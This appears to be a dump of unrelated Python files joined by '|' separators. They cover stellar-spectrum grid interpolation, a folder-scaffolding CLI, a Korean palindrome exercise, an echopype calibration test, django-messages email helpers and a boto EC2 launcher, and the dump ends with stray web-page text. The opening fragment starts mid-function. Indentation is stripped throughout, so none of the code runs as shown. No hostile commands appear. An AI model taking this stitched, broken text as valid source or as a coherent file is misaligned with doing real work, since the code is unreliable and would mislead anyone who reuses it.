for current_aps, current_weight in zip(np.atleast_2d(aps), _weights):
logT, logg, logZ = current_aps
# logZ = np.log10(Z)
# find Zsup and Zinf
where = np.searchsorted(grid_logZ, logZ)
if where >=0:
logZinf = grid_logZ[where]
else:
raise ValueError("Metallicity extrapolation")
if abs(logZinf - logZ) < 1e-4:
# exact match no need to interpolate twice.
select = (abs(logZinf - osl_logZ) < 1e-4)
# call Pegase interpolation scheme
# Interpolation of the (logT, logg) grid at fixed Z from pegase.2
# it returns the knots'indices from the input data and their weights, resp.
# the final result is then the weighted sum.
indices, alphas = __interp__(logT, logg,
osl_logT[select], osl_logg[select],
dT_max=self.dlogT_max, eps=self.eps)
# indices are for the selection
# if indices[k] = -1, then one corner is rejected
data_indices = library_index[select][indices[indices >= 0]]
data_weights = alphas[indices >= 0]
spectrum = np.sum(values[data_indices] * data_weights[:, None], axis=0)
# store the weighted sum * the input requested weight
final_values.append(spectrum * current_weight)
else:
logZsup = grid_logZ[where + 1]
# interpolate within each (therefore calling interp with Zinf, Zsup, resp.)
# then linearly interpolate between logZ values.
inf_spectrum = self.interp_other((logT, logg, logZinf), values, weights=current_weight, **kwargs)
sup_spectrum = self.interp_other((logT, logg, logZsup), values, weights=current_weight, **kwargs)
spectrum = inf_spectrum * (logZ - logZinf) / (logZsup - logZinf) + sup_spectrum * (logZsup - logZ) / (logZsup - logZinf)
final_values.append(spectrum)
return np.squeeze(final_values)
'''
class LejeuneInterpolator(BaseInterpolator):
""" Interpolation for grid based on the Lejeune library definition
The interpolation is N-D linear in log-temperature, log-gravity, and linear
in metallicity Z. Preference is always given to the temperature over the
gravity when needed.
This version is translated from Pegase
Attributes
----------
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
"""
def __init__(self, osl, dT_max=0.1, eps=1e-6, *args, **kwargs):
BaseInterpolator.__init__(self, osl, *args, **kwargs)
self.dlogT_max = dT_max
self.eps = eps
self.osl = osl
def _osl_interp_weights(self, osl, T0, g0, Z0, dT_max=0.1, eps=1e-6):
""" Interpolation of the T,g grid
Interpolate on the grid and returns star indices and associated weights,
and Z.
3 to 12 stars are returned.
It calls _interp_, but reduce the output to the relevant stars.
Parameters
----------
T0: float
log(Teff) to obtain
g0: float
log(g) to obtain
Z0: float
metallicity to obtain
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
Returns
-------
idx: ndarray, dtype=int, size=4
4 star indexes
w: ndarray, dtype=float, size=4
4 associated weights
Returns 3 to 12 star indexes and associated weights
"""
# interpolation must be by construction from logT, logg, Z
# logZ could be an alternative.
osl_logT, osl_logg, osl_logZ = self.osl.get_interpolation_data().T[:3]
_Z = 10 ** osl_logZ
_Zv = np.unique(_Z)
_T = np.asarray(osl_logT, dtype=np.double)
_g = np.asarray(osl_logg, dtype=np.double)
bZ_m = True in (abs(_Zv - Z0) < 1e-28) # Z_match bool
r = np.where((_Zv < Z0))[0]
Z_inf = _Zv[r.max()] if len(r) > 0 else -1.
r = np.where((_Zv > Z0))[0]
Z_sup = _Zv[r.min()] if len(r) > 0 else -1.
index = np.zeros(4 * 3) - 1
weights = np.zeros(4 * 3)
Z = np.zeros(4 * 3)
if (bZ_m):
ind = np.where((abs(_Z - Z0) < 1e-28))
i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[8:] = ind[0][i]
weights[8:] = np.squeeze(w)
Z[8:] = [Z0] * 4
else:
if (Z_inf > 0.):
ind = np.where(_Z == Z_inf)
i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[:4] = ind[0][i]
weights[:4] = np.squeeze(w)
Z[:4] = [Z_inf] * 4
if (Z_sup > 0.):
ind = np.where(_Z == Z_sup)
i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[4:8] = ind[0][i]
weights[4:8] = np.squeeze(w)
Z[4:8] = [Z_sup] * 4
if ((Z_inf > 0.) & (Z_sup > 0.)):
if ( Z_sup - Z_inf ) > 0.:
fz = (Z0 - Z_inf) / ( Z_sup - Z_inf )
weights[:4] *= fz
weights[4:8] *= ( 1. - fz )
else:
weights[:8] *= 0.5
ind = np.where(weights > 0)
return index[ind].astype(int), weights[ind] # / (weights[ind].sum()) #, Z[ind]
def _interp_weights(self, aps, weights=None, **kwargs):
""" returns interpolation nodes and weights
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
node_weights: array
osl grid node indices and interpolation weights
"""
_aps = np.atleast_2d(aps)
if weights is None:
_weights = np.ones(len(_aps), dtype=float)
elif np.ndim(weights) == 0:
_weights = np.ones(len(_aps), dtype=float) * weights
else:
_weights = weights
node_weights = []
for s, current_weight in zip(_aps, _weights):
logT, logg, logZ = s[:3]
Z = 10 ** logZ
current_nodes = np.array(self._osl_interp_weights(self.osl, logT, logg, Z, **kwargs)).T
current_nodes[:, 1] *= current_weight
node_weights.append(current_nodes)
return node_weights
def _evaluate_from_weights(self, r, other):
""" Evaluate the interpolation from interpolation nodes and weights
Basically do a weighted sum on the grid using the interpolation weights
Parameters
----------
node_weights: array
osl grid node indices and interpolation weights
result of interp_weights
other: array
values to interpolate
Returns
-------
interpolated: ndarray (size(node_weights), )
interpolated values
"""
if np.ndim(other) < 2:
values = np.atleast_2d([other]).T
else:
values = np.atleast_2d(other)
interpolated = [(((values[rk[:, 0].astype(int)].T) * rk[:, 1])).sum(1) for rk in r]
return np.squeeze(interpolated)
def interp(self, aps, weights=None, **kwargs):
"""
Interpolate spectra
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
s0: ndarray (len(aps), len(l0))
interpolated spectra
"""
s0 = self.interp_other(aps, self.osl.spectra, weights=weights, **kwargs)
return s0
def interp_other(self, aps, other, weights=None, **kwargs):
""" Interpolate other grid values
Basically do a weighted sum on the grid using the interpolation weights
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
interpolated: ndarray (size(node_weights), )
interpolated values
"""
r = self._interp_weights(aps, weights, **kwargs)
interpolated = self._evaluate_from_weights(r, other)
return interpolated
|
"""EBP
Usage:
ebp use-default <root>
ebp use <name>
ebp show-default
ebp save-default
ebp (-h | --help)
ebp (-v | --version)
Options:
-h --help Show this screen.
-v --version Show version.
"""
import os
import json
import pprint
from collections import OrderedDict
from docopt import docopt
DEFAULT = {
"root": "/home/user/",
"tag": "default",
"structure": {
"lib":{
"package":True,
"contain":{
"core":{
"package":True,
"contain":{}
},
"config":{
"package":True,
"contain":{}
},
"datatools":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"augment":{
"package":True,
"contain":{}
},
"buid":{
"package":True,
"contain":{}
},
"dataclass":{
"package":True,
"contain":{}
},
"evaluate":{
"package":True,
"contain":{}
},
"sampler":{
"package":True,
"contain":{}
}
}
},
"networks":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"auxiliary":{
"package":True,
"contain":{}
},
"build":{
"package":True,
"contain":{}
},
"parts":{
"package":True,
"contain":{}
}
}
},
"loss":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"build":{
"package":True,
"contain":{}
},
"functions":{
"package":True,
"contain":{}
}
}
}
}
},
"data":{
"package": False,
"contain": {}
},
"experiments":{
"package": False,
"contain": {
"resnet": {
"contain":{
"coco": {},
"voc":{}
}
},
"Hrnet":{
"contain":{
"coco":{},
"voc":{}
}
}
}
},
"script":{
"package": False,
"contain":{}
}
},
"main_file":True
}
def build_folder(structure, root_path, package):
# print(f'build the folder{structure}')
if not os.path.exists(root_path):
os.makedirs(root_path)
if package:
with open(os.path.join(root_path, '__init__.py'), 'w') as f:
pass
if not structure:
return
for key in structure.keys():
temp = os.path.join(root_path, key)
if 'package' in structure[key]:
package = structure[key]['package']
elif package:
package = package
else:
package = False
if 'contain' in structure[key]:
build_folder(structure[key]['contain'], temp, package)
else:
build_folder(structure[key], temp, package)
def read_structure(json_path):
with open(json_path, 'r') as f:
structure = json.load(f)
structure = OrderedDict(structure)
main_flag = structure['main_file']
return structure['structure'], structure['root'], main_flag
def save_structure(structure):
with open('default_structure.json', 'w') as f:
json.dump(structure, f)
print('Save in default_structure.json')
def use_custom(json_path):
structure, root_path, main_flag = read_structure(json_path)
if main_flag:
with open(os.path.join(root_path, 'main.py'), 'w') as f:
pass
build_folder(structure, root_path, False)
def main():
arguments = docopt(__doc__, version="1.0.3")
if arguments['use-default']:
build_folder(DEFAULT['structure'], arguments['<root>'], False)
if arguments['show-default']:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(DEFAULT)
if arguments['save-default']:
save_structure(DEFAULT)
if arguments['use']:
use_custom(arguments['<name>'])
if __name__ == '__main__':
main()
|
# 회문
# DP와 반복문을 이용한 풀이.
# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV14QpAaAAwCFAYi&categoryId=AV14QpAaAAwCFAYi&categoryType=CODE&&&
# 반복문을 이용한 풀이
for tc in range(1, 11):
n=int(input())
result=0
lis=[input() for _ in range(8)]
rev_lis=list(map(list, zip(*lis)))
for i in range(8):
for j in range(9-n):
horiz=lis[i][j:j+n]
verti=rev_lis[i][j:j+n]
if horiz==horiz[::-1]:
result+=1
if verti==verti[::-1]:
result+=1
print("#{} {}".format(tc, result))
# DP를 이용한 풀이
# def reverse(temp):
# lis=[[] for _ in range(8)]
# idx=0
#
# for i in temp:
# for a in i:
# lis[idx].append(a)
# idx+=1
# idx=0
#
# return lis
#
#
# def palindrome(temp):
# result=0
#
# for lis in temp:
# dp=[[0]*(8) for _ in range(8)]
#
# for i in range(8): # 길이가 1인 경우는 모두 팰린드롬
# dp[i][i]=1
# if n==1:
# result+=1
#
# for i in range(7): # 길이가 2인 경우는 확인 후 팰린드롬
# if lis[i]==lis[i+1]:
# dp[i][i+1]=1
# if n==2:
# result+=1
#
# for i in range(2,n): # 길이가 3이상인 경우도 확인 후 팰린드롬
# for j in range(8-i):
# if lis[j]==lis[j+i] and dp[j+1][j+i-1]==1:
# # 이미 이전의 길이들은 팰린드롬인 지 확인했기에 그것을 토대로 검사
# dp[j][j+i]=1
# if i==(n-1):
# result+=1
# return result
#
# if __name__=="__main__":
#
# for tc in range(1, 11):
# n=int(input())
# temp=[]
# for _ in range(8):
# temp.append(input())
#
# print("#{} {}".format(tc, palindrome(temp)+palindrome(reverse(temp))))
|
from pathlib import Path
from datetime import datetime
from echopype.calibrate.ecs_parser import ECSParser
data_dir = Path("./echopype/test_data/ecs")
CORRECT_PARSED_PARAMS = {
"fileset": {
"SoundSpeed": 1496.0,
"TvgRangeCorrection": "BySamples",
"TvgRangeCorrectionOffset": 2.0,
},
"sourcecal": {
"T1": {
"AbsorptionCoefficient": 0.002822,
"EK60SaCorrection": -0.7,
"Ek60TransducerGain": 22.95,
"MajorAxis3dbBeamAngle": 10.82,
"MajorAxisAngleOffset": 0.25,
"MajorAxisAngleSensitivity": 13.89,
"MinorAxis3dbBeamAngle": 10.9,
"MinorAxisAngleOffset": -0.18,
"MinorAxisAngleSensitivity": 13.89,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -17.37,
},
"T2": {
"AbsorptionCoefficient": 0.009855,
"EK60SaCorrection": -0.52,
"Ek60TransducerGain": 26.07,
"MajorAxis3dbBeamAngle": 6.85,
"MajorAxisAngleOffset": 0.0,
"MajorAxisAngleSensitivity": 21.970001,
"MinorAxis3dbBeamAngle": 6.81,
"MinorAxisAngleOffset": -0.08,
"MinorAxisAngleSensitivity": 21.970001,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -21.01,
},
"T3": {
"AbsorptionCoefficient": 0.032594,
"EK60SaCorrection": -0.3,
"Ek60TransducerGain": 26.55,
"MajorAxis3dbBeamAngle": 6.52,
"MajorAxisAngleOffset": 0.37,
"MajorAxisAngleSensitivity": 23.12,
"MinorAxis3dbBeamAngle": 6.58,
"MinorAxisAngleOffset": -0.05,
"MinorAxisAngleSensitivity": 23.12,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -20.47,
},
},
"localcal": {"MyCal": {"TwoWayBeamAngle": -17.37}},
}
def test_convert_ecs():
# Test converting an EV calibration file (ECS)
ecs_path = data_dir / "Summer2017_JuneCal_3freq_mod.ecs"
ecs = ECSParser(ecs_path)
ecs.parse()
# Spot test parsed outcome
assert ecs.data_type == "SimradEK60Raw"
assert ecs.version == "1.00"
assert ecs.file_creation_time == datetime(
year=2015, month=6, day=19, hour=23, minute=26, second=4
)
assert ecs.parsed_params == CORRECT_PARSED_PARAMS
cal_params = ecs.get_cal_params()
# Test SourceCal overwrite FileSet settings
assert cal_params["T1"]["SoundSpeed"] == 1480.60
# Test overwrite by LocalCal
assert cal_params["T2"]["TwoWayBeamAngle"] == -17.37
|
import re
from django.utils.text import wrap
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.sites.models import Site
from django.template import Context, loader
from django.template.loader import render_to_string
from django.conf import settings
# favour django-mailer but fall back to django.core.mail
if "mailer" in settings.INSTALLED_APPS:
from mailer import send_mail
else:
from django.core.mail import send_mail
def format_quote(sender, body):
"""
Wraps text at 55 chars and prepends each
line with `> `.
Used for quoting messages in replies.
"""
lines = wrap(body, 55).split('\n')
for i, line in enumerate(lines):
lines[i] = "> %s" % line
quote = '\n'.join(lines)
return ugettext(u"%(sender)s wrote:\n%(body)s") % {
'sender': sender,
'body': quote
}
def format_subject(subject):
"""
Prepends 'Re:' to the subject. To avoid multiple 'Re:'s
a counter is added.
NOTE: Currently unused. First step to fix Issue #48.
FIXME: Any hints how to make this i18n aware are very welcome.
"""
subject_prefix_re = r'^Re\[(\d*)\]:\ '
m = re.match(subject_prefix_re, subject, re.U)
prefix = u""
if subject.startswith('Re: '):
prefix = u"[2]"
subject = subject[4:]
elif m is not None:
try:
num = int(m.group(1))
prefix = u"[%d]" % (num + 1)
subject = subject[6 + len(str(num)):]
except:
# if anything fails here, fall back to the old mechanism
pass
return ugettext(u"Re%(prefix)s: %(subject)s") % {
'subject': subject,
'prefix': prefix
}
def new_message_email(sender, instance, signal,
subject_prefix=_(u'New Message: %(subject)s'),
template_name="django_messages/new_message.html",
default_protocol=None,
*args, **kwargs):
"""
This function sends an email and is called via Django's signal framework.
Optional arguments:
``template_name``: the template to use
``subject_prefix``: prefix for the email subject.
``default_protocol``: default protocol in site URL passed to template
"""
if default_protocol is None:
default_protocol = getattr(settings, 'DEFAULT_HTTP_PROTOCOL', 'http')
if 'created' in kwargs and kwargs['created']:
try:
current_domain = Site.objects.get_current().domain
subject = subject_prefix % {'subject': instance.subject}
message = render_to_string(template_name, {
'site_url': '%s://%s' % (default_protocol, current_domain),
'message': instance,
})
if instance.recipient.email != "":
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL,
[instance.recipient.email, ])
except Exception as e:
pass # fail silently
|
#!/usr/bin/env python
"""
http://docs.aws.amazon.com/ElasticLoadBalancing/latest/DeveloperGuide/elb-cloudwatch-metrics.html
"""
import boto.ec2
import os
import sys
import time
AWS_REGION = os.environ['EC2_REGION']
AWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = os.environ['AWS_SECRET_KEY']
def create_instance(ami, instance_type):
tags = {}
tags['Name'] = 'web_production_JAILS'
tags['Salt'] = 'web_production_JAILS'
conn = boto.ec2.connect_to_region(
AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY,
aws_secret_access_key=AWS_SECRET_KEY)
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id='subnet-f61b5293',
groups=['sg-e77c9683'],
device_index=0,
secondary_private_ip_address_count=3,
associate_public_ip_address=False
)
interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(
interface)
reservation = conn.run_instances(
ami,
key_name='VPC',
instance_type=instance_type,
network_interfaces=interfaces,
dry_run=False
)
instance = reservation.instances[0]
# Check up on its status every so often
status = instance.update()
while status == 'pending':
time.sleep(10)
status = instance.update()
if status == 'running':
instance.add_tags(tags)
else:
print('Instance status: ' + status)
if __name__ == "__main__":
# if not sys.argv[2:]:
# print "Enter ELB name"
# sys.exit(1)
ami = 'ami-dddd78ae'
instance_type = 't2.medium'
print create_instance(ami, instance_type)
|
from hamlyn2021.data_processing.data_scraping import RandomDownloader, SequenceDownloader
__all__ = [
RandomDownloader,
SequenceDownloader,
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.